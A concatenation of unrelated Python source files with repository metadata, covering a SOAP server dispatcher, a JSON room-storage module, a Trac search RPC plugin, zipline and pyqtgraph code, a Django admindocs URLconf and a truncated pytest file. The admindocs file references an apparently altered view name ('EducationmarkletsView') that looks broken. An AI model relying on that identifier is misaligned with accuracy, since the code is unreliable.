# We put [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')]
# mix it with {'http://external.mt.moboperator': 'ext', 'http://model.common.mt.moboperator': 'mod'}
mapping = dict(
((k, _ns_reversed[v]) for k, v in self.namespaces.items())) # Switch keys-values and change value
# and get {'model': u'mod', 'external': u'ext'}
response = SimpleXMLElement(xml,
namespace=self.namespace,
namespaces_map=mapping,
prefix=prefix)
response['xmlns:xsi'] = "http://www.w3.org/2001/XMLSchema-instance"
response['xmlns:xsd'] = "http://www.w3.org/2001/XMLSchema"
body = response.add_child("%s:Body" % soap_ns, ns=False)
if fault:
# generate a Soap Fault (with the python exception)
body.marshall("%s:Fault" % soap_ns, fault, ns=False)
else:
# return normal value
res = body.add_child(self.response_element_name(name), ns=self.namespace)
if not prefix:
res['xmlns'] = self.namespace # add target namespace
# serialize returned values (response) if type definition available
if returns_types:
# TODO: full sanity check of type structure (recursive)
complex_type = isinstance(ret, dict)
if complex_type:
# check if type mapping correlates with return value
types_ok = all([k in returns_types for k in ret.keys()])
if not types_ok:
warnings.warn("Return value doesn't match type structure: "
"%s vs %s" % (str(returns_types), str(ret)))
if not complex_type or not types_ok:
# backward compatibility for scalar and simple types
res.marshall(list(returns_types.keys())[0], ret, )
else:
# new style for complex classes
for k, v in ret.items():
res.marshall(k, v)
elif returns_types is None:
# merge xmlelement returned
res.import_node(ret)
elif returns_types == {}:
log.warning('Given returns_types is an empty dict.')
return response.as_xml(pretty=self.pretty)
# Introspection functions:
def list_methods(self):
"""Return a list of aregistered operations"""
return [(method, doc) for method, (function, returns, args, doc, response_element_name) in self.methods.items()]
def help(self, method=None):
"""Generate sample request and response messages"""
(function, returns, args, doc, response_element_name) = self.methods[method]
xml = """
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><%(method)s xmlns="%(namespace)s"/></soap:Body>
</soap:Envelope>""" % {'method': method, 'namespace': self.namespace}
request = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix)
if args:
items = args.items()
elif args is None:
items = [('value', None)]
else:
items = []
for k, v in items:
request(method).marshall(k, v, add_comments=True, ns=False)
xml = """
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><%(response_element_name)s xmlns="%(namespace)s"/></soap:Body>
</soap:Envelope>""" % {'response_element_name': response_element_name, 'namespace': self.namespace}
response = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix)
if returns:
items = returns.items()
elif args is None:
items = [('value', None)]
else:
items = []
for k, v in items:
response(response_element_name).marshall(k, v, add_comments=True, ns=False)
return request.as_xml(pretty=True), response.as_xml(pretty=True), doc
def wsdl(self):
"""Generate Web Service Description v1.1"""
xml = """<?xml version="1.0"?>
<wsdl:definitions name="%(name)s"
targetNamespace="%(namespace)s"
xmlns:tns="%(namespace)s"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">%(documentation)s</wsdl:documentation>
<wsdl:types>
<xsd:schema targetNamespace="%(namespace)s"
elementFormDefault="qualified"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
</xsd:schema>
</wsdl:types>
</wsdl:definitions>
""" % {'namespace': self.namespace, 'name': self.name, 'documentation': self.documentation}
wsdl = SimpleXMLElement(xml)
for method, (function, returns, args, doc, response_element_name) in self.methods.items():
# create elements:
def parse_element(name, values, array=False, complex=False):
if not complex:
element = wsdl('wsdl:types')('xsd:schema').add_child('xsd:element')
complex = element.add_child("xsd:complexType")
else:
complex = wsdl('wsdl:types')('xsd:schema').add_child('xsd:complexType')
element = complex
element['name'] = name
if values:
items = values
elif values is None:
items = [('value', None)]
else:
items = []
if not array and items:
all = complex.add_child("xsd:all")
elif items:
all = complex.add_child("xsd:sequence")
for k, v in items:
e = all.add_child("xsd:element")
e['name'] = k
if array:
e[:] = {'minOccurs': "0", 'maxOccurs': "unbounded"}
if v is None:
t = 'xsd:anyType'
elif type(v) == list:
n = "ArrayOf%s%s" % (name, k)
l = []
for d in v:
l.extend(d.items())
parse_element(n, l, array=True, complex=True)
t = "tns:%s" % n
elif type(v) == dict:
n = "%s%s" % (name, k)
parse_element(n, v.items(), complex=True)
t = "tns:%s" % n
elif v in TYPE_MAP:
t = 'xsd:%s' % TYPE_MAP[v]
else:
raise TypeError("unknown type %s for marshalling" % str(v))
e.add_attribute('type', t)
parse_element("%s" % method, args and args.items())
parse_element(response_element_name, returns and returns.items())
# create messages:
for m, e in ('Input', method), ('Output', response_element_name):
message = wsdl.add_child('wsdl:message')
message['name'] = "%s%s" % (method, m)
part = message.add_child("wsdl:part")
part[:] = {'name': 'parameters',
'element': 'tns:%s' % e}
# create ports
portType = wsdl.add_child('wsdl:portType')
portType['name'] = "%sPortType" % self.name
for method, (function, returns, args, doc, response_element_name) in self.methods.items():
op = portType.add_child('wsdl:operation')
op['name'] = method
if doc:
op.add_child("wsdl:documentation", doc)
input = op.add_child("wsdl:input")
input['message'] = "tns:%sInput" % method
output = op.add_child("wsdl:output")
output['message'] = "tns:%sOutput" % method
# create bindings
binding = wsdl.add_child('wsdl:binding')
binding['name'] = "%sBinding" % self.name
binding['type'] = "tns:%sPortType" % self.name
soapbinding = binding.add_child('soap:binding')
soapbinding['style'] = "document"
soapbinding['transport'] = "http://schemas.xmlsoap.org/soap/http"
for method in self.methods.keys():
op = binding.add_child('wsdl:operation')
op['name'] = method
soapop = op.add_child('soap:operation')
soapop['soapAction'] = self.action + method
soapop['style'] = 'document'
input = op.add_child("wsdl:input")
##input.add_attribute('name', "%sInput" % method)
soapbody = input.add_child("soap:body")
soapbody["use"] = "literal"
output = op.add_child("wsdl:output")
##output.add_attribute('name', "%sOutput" % method)
soapbody = output.add_child("soap:body")
soapbody["use"] = "literal"
service = wsdl.add_child('wsdl:service')
service["name"] = "%sService" % self.name
service.add_child('wsdl:documentation', text=self.documentation)
port = service.add_child('wsdl:port')
port["name"] = "%s" % self.name
port["binding"] = "tns:%sBinding" % self.name
soapaddress = port.add_child('soap:address')
soapaddress["location"] = self.location
return wsdl.as_xml(pretty=True)
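# SOAPHandler serves three things over plain BaseHTTPServer: GET / returns the
# generated WSDL, GET /<method>?request (or ?response) returns the sample
# messages from help(), and POST runs the dispatcher, answering 500 when the
# fault dict was populated.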
class SOAPHandler(BaseHTTPRequestHandler):
def do_GET(self):
"""User viewable help information and wsdl"""
args = self.path[1:].split("?")
if self.path != "/" and args[0] not in self.server.dispatcher.methods.keys():
self.send_error(404, "Method not found: %s" % args[0])
else:
if self.path == "/":
# return wsdl if no method supplied
response = self.server.dispatcher.wsdl()
else:
# return supplied method help (?request or ?response messages)
req, res, doc = self.server.dispatcher.help(args[0])
if len(args) == 1 or args[1] == "request":
response = req
else:
response = res
self.send_response(200)
self.send_header("Content-type", "text/xml")
self.end_headers()
self.wfile.write(response)
def do_POST(self):
"""SOAP POST gateway"""
request = self.rfile.read(int(self.headers.get('content-length')))
# convert xml request to unicode (according to request headers)
if sys.version < '3':
encoding = self.headers.getparam("charset")
else:
encoding = self.headers.get_param("charset")
request = request.decode(encoding)
fault = {}
# execute the method
response = self.server.dispatcher.dispatch(request, fault=fault)
# check if fault dict was completed (faultcode, faultstring, detail)
if fault:
self.send_response(500)
else:
self.send_response(200)
self.send_header("Content-type", "text/xml")
self.end_headers()
self.wfile.write(response)
class WSGISOAPHandler(object):
def __init__(self, dispatcher):
self.dispatcher = dispatcher
def __call__(self, environ, start_response):
return self.handler(environ, start_response)
def handler(self, environ, start_response):
if environ['REQUEST_METHOD'] == 'GET':
return self.do_get(environ, start_response)
elif environ['REQUEST_METHOD'] == 'POST':
return self.do_post(environ, start_response)
else:
start_response('405 Method not allowed', [('Content-Type', 'text/plain')])
return ['Method not allowed']
def do_get(self, environ, start_response):
path = environ.get('PATH_INFO').lstrip('/')
query = environ.get('QUERY_STRING')
if path != "" and path not in self.dispatcher.methods.keys():
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ["Method not found: %s" % path]
elif path == "":
# return wsdl if no method supplied
response = self.dispatcher.wsdl()
else:
# return supplied method help (?request or ?response messages)
req, res, doc = self.dispatcher.help(path)
if len(query) == 0 or query == "request":
response = req
else:
response = res
start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))])
return [response]
def do_post(self, environ, start_response):
length = int(environ['CONTENT_LENGTH'])
request = environ['wsgi.input'].read(length)
response = self.dispatcher.dispatch(request)
start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))])
return [response]
if __name__ == "__main__":
dispatcher = SoapDispatcher(
name="PySimpleSoapSample",
location="http://localhost:8008/",
action='http://localhost:8008/', # SOAPAction
namespace="http://example.com/pysimplesoapsamle/", prefix="ns0",
documentation='Example soap service using PySimpleSoap',
trace=True, debug=True,
ns=True)
def adder(p, c, dt=None):
"""Add several values"""
dt = dt + datetime.timedelta(365)
return {'ab': p['a'] + p['b'], 'dd': c[0]['d'] + c[1]['d'], 'dt': dt}
def dummy(in0):
"""Just return input"""
return in0
def echo(request):
"""Copy request->response (generic, any type)"""
return request.value
dispatcher.register_function(
'Adder', adder,
returns={'AddResult': {'ab': int, 'dd': unicode, 'dt': datetime.date}},
args={'p': {'a': int, 'b': int}, 'dt': Date, 'c': [{'d': Decimal}]}
)
dispatcher.register_function(
'Dummy', dummy,
returns={'out0': str},
args={'in0': str}
)
dispatcher.register_function('Echo', echo)
if '--local' in sys.argv:
wsdl = dispatcher.wsdl()
for method, doc in dispatcher.list_methods():
request, response, doc = dispatcher.help(method)
if '--serve' in sys.argv:
log.info("Starting server...")
httpd = HTTPServer(("", 8008), SOAPHandler)
httpd.dispatcher = dispatcher
httpd.serve_forever()
if '--wsgi-serve' in sys.argv:
log.info("Starting wsgi server...")
from wsgiref.simple_server import make_server
application = WSGISOAPHandler(dispatcher)
wsgid = make_server('', 8008, application)
wsgid.serve_forever()
if '--consume' in sys.argv:
from .client import SoapClient
client = SoapClient(
location="http://localhost:8008/",
action='http://localhost:8008/', # SOAPAction
namespace="http://example.com/sample.wsdl",
soap_ns='soap',
trace=True,
ns="ns0",
)
p = {'a': 1, 'b': 2}
c = [{'d': '1.20'}, {'d': '2.01'}]
response = client.Adder(p=p, dt='2010-07-24', c=c)
result = response.AddResult
log.info(int(result.ab))
log.info(str(result.dd))
if '--consume-wsdl' in sys.argv:
from .client import SoapClient
client = SoapClient(
wsdl="http://localhost:8008/",
)
p = {'a': 1, 'b': 2}
c = [{'d': '1.20'}, {'d': '2.01'}]
dt = datetime.date.today()
response = client.Adder(p=p, dt=dt, c=c)
result = response['AddResult']
log.info(int(result['ab']))
log.info(str(result['dd']))
avg_line_length: 39.882261 | max_line_length: 120 | alphanum_fraction: 0.55556

hexsha: 09348d427d83e25f47dedcc3f787fd58db41f760 | size: 8,432 | ext: py | lang: Python
max_stars:  repo_path=lib/set_room.py | repo_name=MuffinAmor/nellie | head_hexsha=eace65ac7d7d1730c131345e6e5e5b7d39b078ef | licenses=["MIT"] | count=1 | event_min=2022-03-12T17:34:05.000Z | event_max=2022-03-12T17:34:05.000Z
max_issues: repo_path=lib/set_room.py | repo_name=MuffinAmor/nellie | head_hexsha=eace65ac7d7d1730c131345e6e5e5b7d39b078ef | licenses=["MIT"] | count=null | event_min=null | event_max=null
max_forks:  repo_path=lib/set_room.py | repo_name=MuffinAmor/nellie | head_hexsha=eace65ac7d7d1730c131345e6e5e5b7d39b078ef | licenses=["MIT"] | count=null | event_min=null | event_max=null
content:
import json
import os
import sys
os.chdir(r'/')
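# Storage layout: each room is a single JSON document at
# Global/rooms/<name>.json (relative to the working directory set above); every
# helper below re-reads the file, mutates one key and rewrites it in full.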
def create_tree():
if not os.path.isfile("Global"):
try:
os.mkdir("Global")
except:
pass
if not os.path.isfile("Global/rooms"):
try:
os.mkdir("Global/rooms")
except:
pass
def create_room(name: str, user_id: str):
create_tree()
if not os.path.isfile("Global/rooms/{}.json".format(name)):
data = {'num': name,
'owner': user_id,
'cid': [],
'mods': [],
'banned': [],
'blacklist': [],
'spam': 3,
'lang': 'Not set.',
'desc': 'Not set.',
'topic': "None",
'pictures': True,
'open': False,
'vip': [],
'partner': []
}
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return False
def edit_special(name: str, id: int, action: str, pos: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
special = list(data[pos])
if action == "append":
if id in special:
return False
else:
data[pos].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in special:
return False
else:
data[pos].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data[pos].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
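# The three helpers below (edit_banned, edit_mods, edit_channel) repeat
# edit_special with the list key hard-coded to 'banned', 'mods' and 'cid'
# respectively; edit_special(name, id, action, pos) already covers all of them.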
def edit_banned(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
banned = list(data['banned'])
if action == "append":
if id in banned:
return False
else:
data['banned'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in banned:
return False
else:
data['banned'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['banned'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def edit_mods(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
mods = data['mods']
if action == "append":
if id in mods:
return False
else:
data['mods'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in mods:
return False
else:
data['mods'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['mods'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def edit_channel(name: str, id: int, action: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
cid = list(data['cid'])
if action == "append":
if id in cid:
return False
else:
data['cid'].append(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "remove":
if not id in cid:
return False
else:
data['cid'].remove(id)
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
elif action == "clear":
data['cid'].clear()
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def is_connected(id: int, stat: str):
try:
create_tree()
liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms')
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if id in data[stat]:
return name.replace(".json", "")
else:
return False
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
def edit_room(name: str, stat: str, wert):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
data[stat] = wert
with open("Global/rooms/{}.json".format(name), "w+") as fp:
json.dump(data, fp, indent=4)
return True
else:
return None
def is_owner(id: str):
create_tree()
liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms')
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if str(id) == data['owner']:
return name.replace(".json", "")
else:
return False
def get_info(name: str, stat: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp:
data = json.load(fp)
return data[stat]
else:
return None
def get_more_info(stat: str):
create_tree()
a = r"/home/niko/data/Nellie/Global/rooms/"
liste = os.listdir(a)
all = []
for name in liste:
with open("Global/rooms/{}".format(name), encoding="utf-8") as fp:
data = json.load(fp)
if data[stat]:
all.append(name.replace(".json", ""))
return all
def name_check(name: str):
create_tree()
a = r"/home/niko/data/Nellie/Global/rooms/"
liste = os.listdir(a)
all = []
for i in liste:
with open("Global/rooms/{}".format(i), encoding="utf-8") as fp:
data = json.load(fp)
if data['num'] == i.replace(".json", ""):
all.append(i.replace(".json", ""))
if name in all:
return True
else:
return False
def del_room(name: str):
create_tree()
if os.path.isfile("Global/rooms/{}.json".format(name)):
os.remove("Global/rooms/{}.json".format(name))
return True
else:
return False
avg_line_length: 32.682171 | max_line_length: 80 | alphanum_fraction: 0.480313

hexsha: 3d008e7524687a609fb3858b59eaa5be1ecf6451 | size: 1,936 | ext: py | lang: Python
max_stars:  repo_path=files/xmlrpcplugin/0.10/tracrpc/search.py | repo_name=Puppet-Finland/puppet-trac | head_hexsha=ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3 | licenses=["BSD-2-Clause"] | count=null | event_min=null | event_max=null
max_issues: repo_path=files/xmlrpcplugin/0.10/tracrpc/search.py | repo_name=Puppet-Finland/puppet-trac | head_hexsha=ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3 | licenses=["BSD-2-Clause"] | count=null | event_min=null | event_max=null
max_forks:  repo_path=files/xmlrpcplugin/0.10/tracrpc/search.py | repo_name=Puppet-Finland/puppet-trac | head_hexsha=ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3 | licenses=["BSD-2-Clause"] | count=null | event_min=null | event_max=null
content:
from trac.core import *
from tracrpc.api import IXMLRPCHandler
from trac.Search import ISearchSource
try:
a = set()
except:
from sets import Set as set
class SearchRPC(Component):
""" Search Trac. """
implements(IXMLRPCHandler)
search_sources = ExtensionPoint(ISearchSource)
# IXMLRPCHandler methods
def xmlrpc_namespace(self):
return 'search'
def xmlrpc_methods(self):
yield ('SEARCH_VIEW', ((list,),), self.getSearchFilters)
yield ('SEARCH_VIEW', ((list, str), (list, str, list)), self.performSearch)
# Others
def getSearchFilters(self, req):
""" Retrieve a list of search filters with each element in the form
(name, description). """
for source in self.search_sources:
for filter in source.get_search_filters(req):
yield filter
def performSearch(self, req, query, filters = []):
""" Perform a search using the given filters. Defaults to all if not
provided. Results are returned as a list of tuples in the form
(href, title, date, author, excerpt)."""
from trac.Search import search_terms
query = search_terms(query)
chosen_filters = set(filters)
available_filters = []
for source in self.search_sources:
available_filters += source.get_search_filters(req)
filters = [f[0] for f in available_filters if f[0] in chosen_filters]
if not filters:
filters = [f[0] for f in available_filters]
self.env.log.debug("Searching with %s" % filters)
results = []
for source in self.search_sources:
for result in source.get_search_results(req, query, filters):
result = map(unicode, result)
results.append(['/'.join(req.base_url.split('/')[0:3])
+ result[0]] + list(result[1:]))
return results
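# Illustrative client-side sketch (not part of the original plugin). The
# endpoint path and the 'ticket' filter name below are assumptions and depend
# on how XmlRpcPlugin is configured for this Trac 0.10 install:
#   import xmlrpclib
#   proxy = xmlrpclib.ServerProxy('http://user:password@localhost/trac/login/xmlrpc')
#   print proxy.search.getSearchFilters()
#   print proxy.search.performSearch('segfault', ['ticket'])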
avg_line_length: 35.2 | max_line_length: 83 | alphanum_fraction: 0.619835

hexsha: 72aeaa4a6631dc9e69f1cf348282ffb3310e6ecc | size: 87 | ext: py | lang: Python
max_stars:  repo_path=micApp/apps.py | repo_name=AkashPushkar/audio-synthesis-webapp | head_hexsha=b4053e0cea315d3906c7482249de0c02fcc802d6 | licenses=["MIT"] | count=null | event_min=null | event_max=null
max_issues: repo_path=micApp/apps.py | repo_name=AkashPushkar/audio-synthesis-webapp | head_hexsha=b4053e0cea315d3906c7482249de0c02fcc802d6 | licenses=["MIT"] | count=7 | event_min=2020-01-28T22:20:14.000Z | event_max=2022-02-09T23:35:32.000Z
max_forks:  repo_path=micApp/apps.py | repo_name=AkashPushkar/audio-synthesis-webapp | head_hexsha=b4053e0cea315d3906c7482249de0c02fcc802d6 | licenses=["MIT"] | count=null | event_min=null | event_max=null
content:
from django.apps import AppConfig
class MicappConfig(AppConfig):
name = 'micApp'
avg_line_length: 14.5 | max_line_length: 33 | alphanum_fraction: 0.747126

hexsha: cf9708372fc17a8548833c24075deaa047e31ba2 | size: 1,909 | ext: py | lang: Python
max_stars:  repo_path=zipline/pipeline/downsample_helpers.py | repo_name=quantrocket-llc/zipline | head_hexsha=4eccd1ff3f07addbdc1f9682b608e0584a9b59c6 | licenses=["Apache-2.0"] | count=14 | event_min=2018-02-05T18:38:15.000Z | event_max=2022-01-15T21:31:30.000Z
max_issues: repo_path=zipline/pipeline/downsample_helpers.py | repo_name=quantrocket-llc/zipline | head_hexsha=4eccd1ff3f07addbdc1f9682b608e0584a9b59c6 | licenses=["Apache-2.0"] | count=null | event_min=null | event_max=null
max_forks:  repo_path=zipline/pipeline/downsample_helpers.py | repo_name=quantrocket-llc/zipline | head_hexsha=4eccd1ff3f07addbdc1f9682b608e0584a9b59c6 | licenses=["Apache-2.0"] | count=8 | event_min=2020-02-14T04:21:46.000Z | event_max=2022-01-30T06:42:50.000Z
content:
"""
Helpers for downsampling code.
"""
from operator import attrgetter
from zipline.utils.input_validation import expect_element
from zipline.utils.numpy_utils import changed_locations
from zipline.utils.sharedoc import (
templated_docstring,
PIPELINE_DOWNSAMPLING_FREQUENCY_DOC,
)
_dt_to_period = {
'year_start': attrgetter('year'),
'quarter_start': attrgetter('quarter'),
'month_start': attrgetter('month'),
'week_start': attrgetter('week'),
}
SUPPORTED_DOWNSAMPLE_FREQUENCIES = frozenset(_dt_to_period)
expect_downsample_frequency = expect_element(
frequency=SUPPORTED_DOWNSAMPLE_FREQUENCIES,
)
@expect_downsample_frequency
@templated_docstring(frequency=PIPELINE_DOWNSAMPLING_FREQUENCY_DOC)
def select_sampling_indices(dates, frequency):
"""
Choose entries from ``dates`` to use for downsampling at ``frequency``.
Parameters
----------
dates : pd.DatetimeIndex
Dates from which to select sample choices.
{frequency}
Returns
-------
indices : np.array[int64]
An array containing indices of dates on which samples should be taken.
The resulting index will always include 0 as a sample index, and it
will include the first date of each subsequent year/quarter/month/week,
as determined by ``frequency``.
Notes
-----
This function assumes that ``dates`` does not have large gaps.
In particular, it assumes that the maximum distance between any two entries
in ``dates`` is never greater than a year, which we rely on because we use
``np.diff(dates.<frequency>)`` to find dates where the sampling
period has changed.
"""
if frequency == "week_start":
# dates.week is deprecated; use dates.isocalendar().week instead
dates = dates.isocalendar()
return changed_locations(
_dt_to_period[frequency](dates),
include_first=True
)
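# Illustrative usage sketch (not part of the original module), assuming a
# pandas DatetimeIndex of business days:
#   import pandas as pd
#   dates = pd.date_range('2014-01-02', '2014-06-30', freq='B')
#   idx = select_sampling_indices(dates, 'month_start')
# idx would then hold 0 plus the position of the first business day of each
# later month, i.e. the dates on which a downsampled pipeline term recomputes.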
avg_line_length: 28.924242 | max_line_length: 79 | alphanum_fraction: 0.711891

hexsha: 961bc5e1558cf9f0ca9e1174c5645728f55a54d7 | size: 1,029 | ext: py | lang: Python
max_stars:  repo_path=scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py | repo_name=kuldeepaman/tf-pose | head_hexsha=8050912c52a7b4f3c8a2656f267d47ba21d093f6 | licenses=["Apache-2.0"] | count=null | event_min=null | event_max=null
max_issues: repo_path=scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py | repo_name=kuldeepaman/tf-pose | head_hexsha=8050912c52a7b4f3c8a2656f267d47ba21d093f6 | licenses=["Apache-2.0"] | count=null | event_min=null | event_max=null
max_forks:  repo_path=scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py | repo_name=kuldeepaman/tf-pose | head_hexsha=8050912c52a7b4f3c8a2656f267d47ba21d093f6 | licenses=["Apache-2.0"] | count=null | event_min=null | event_max=null
content:
import gc
import weakref
try:
import faulthandler
faulthandler.enable()
except ImportError:
pass
import pyqtgraph as pg
pg.mkQApp()
def test_getViewWidget():
view = pg.PlotWidget()
vref = weakref.ref(view)
item = pg.InfiniteLine()
view.addItem(item)
assert item.getViewWidget() is view
del view
gc.collect()
assert vref() is None
assert item.getViewWidget() is None
def test_getViewWidget_deleted():
view = pg.PlotWidget()
item = pg.InfiniteLine()
view.addItem(item)
assert item.getViewWidget() is view
# Arrange to have Qt automatically delete the view widget
obj = pg.QtGui.QWidget()
view.setParent(obj)
del obj
gc.collect()
assert not pg.Qt.isQObjectAlive(view)
assert item.getViewWidget() is None
#if __name__ == '__main__':
#view = pg.PlotItem()
#vref = weakref.ref(view)
#item = pg.InfiniteLine()
#view.addItem(item)
#del view
#gc.collect()
avg_line_length: 21.893617 | max_line_length: 62 | alphanum_fraction: 0.628766

hexsha: bfd20e0979c5d26b50932314489962987fa44fe5 | size: 1,325 | ext: py | lang: Python
max_stars:  repo_path=django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py | repo_name=vignif/django_cv | head_hexsha=0426b47da82341e676adcf7b441a7b55a3fa2d78 | licenses=["MIT"] | count=null | event_min=null | event_max=null
max_issues: repo_path=django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py | repo_name=vignif/django_cv | head_hexsha=0426b47da82341e676adcf7b441a7b55a3fa2d78 | licenses=["MIT"] | count=null | event_min=null | event_max=null
max_forks:  repo_path=django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py | repo_name=vignif/django_cv | head_hexsha=0426b47da82341e676adcf7b441a7b55a3fa2d78 | licenses=["MIT"] | count=null | event_min=null | event_max=null
content:
from django.contrib.admindocs import views
from django.urls import path, re_path
urlpatterns = [
path(
'',
views.BaseAdminDocsView.as_view(template_name='admin_doc/index.html'),
name='django-admindocs-docroot',
),
path(
'educationmarklets/',
views.EducationmarkletsView.as_view(),
name='django-admindocs-educationmarklets',
),
path(
'tags/',
views.TemplateTagIndexView.as_view(),
name='django-admindocs-tags',
),
path(
'filters/',
views.TemplateFilterIndexView.as_view(),
name='django-admindocs-filters',
),
path(
'views/',
views.ViewIndexView.as_view(),
name='django-admindocs-views-index',
),
path(
'views/<view>/',
views.ViewDetailView.as_view(),
name='django-admindocs-views-detail',
),
path(
'models/',
views.ModelIndexView.as_view(),
name='django-admindocs-models-index',
),
re_path(
r'^models/(?P<app_label>[^\.]+)\.(?P<model_name>[^/]+)/$',
views.ModelDetailView.as_view(),
name='django-admindocs-models-detail',
),
path(
'templates/<path:template>/',
views.TemplateDetailView.as_view(),
name='django-admindocs-templates',
),
]
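For context, a hedged sketch of how this URLconf is typically wired into a project; the ``admin/doc/`` prefix is the conventional choice, and it assumes ``django.contrib.admindocs`` is listed in ``INSTALLED_APPS``:
# project urls.py (illustrative)
from django.contrib import admin
from django.urls import include, path

urlpatterns = [
    path('admin/doc/', include('django.contrib.admindocs.urls')),
    path('admin/', admin.site.urls),
]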
| 25.980392
| 78
| 0.579623
|
15852b1dbf986224c4e1f8a7b474892a647b7c59
| 2,668
|
py
|
Python
|
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | null | null | null |
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | 1
|
2021-05-11T02:03:56.000Z
|
2021-05-11T02:03:56.000Z
|
07_itertools/test_bite17.py
|
covrebo/python100
|
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
|
[
"MIT"
] | null | null | null |
import pytest
from bite17 import friends_teams
friends = 'Bob Dante Julian Martin'.split()
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante'), True),
(('Bob', 'Julian'), True),
(('Bob', 'Martin'), True),
(('Dante', 'Julian'), True),
(('Dante', 'Martin'), True),
(('Julian', 'Martin'), True),
# order does not matter
(('Dante', 'Bob'), False),
(('Julian', 'Bob'), False),
(('Martin', 'Bob'), False),
(('Julian', 'Dante'), False),
(('Martin', 'Dante'), False),
(('Martin', 'Julian'), False),
# not with self
(('Julian', 'Julian'), False),
])
def test_team_of_two_order_does_not_matter(test_input, expected):
"""First test lists all combos"""
combos = list(friends_teams(friends, team_size=2, order_does_matter=False))
assert len(combos) == 6
if expected:
assert test_input in combos
else:
assert test_input not in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante'), True),
(('Dante', 'Julian'), True),
(('Dante', 'Martin'), True),
# order does matter
(('Dante', 'Bob'), True),
(('Julian', 'Dante'), True),
(('Martin', 'Dante'), True),
])
def test_team_of_two_order_does_matter(test_input, expected):
"""From here on just test a subset of combos"""
combos = list(friends_teams(friends, team_size=2, order_does_matter=True))
assert len(combos) == 12
assert test_input in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante', 'Julian'), True),
(('Bob', 'Dante', 'Martin'), True),
(('Bob', 'Julian', 'Martin'), True),
(('Dante', 'Julian', 'Martin'), True),
# order does not matter
(('Dante', 'Bob', 'Martin'), False),
(('Julian', 'Martin', 'Dante'), False),
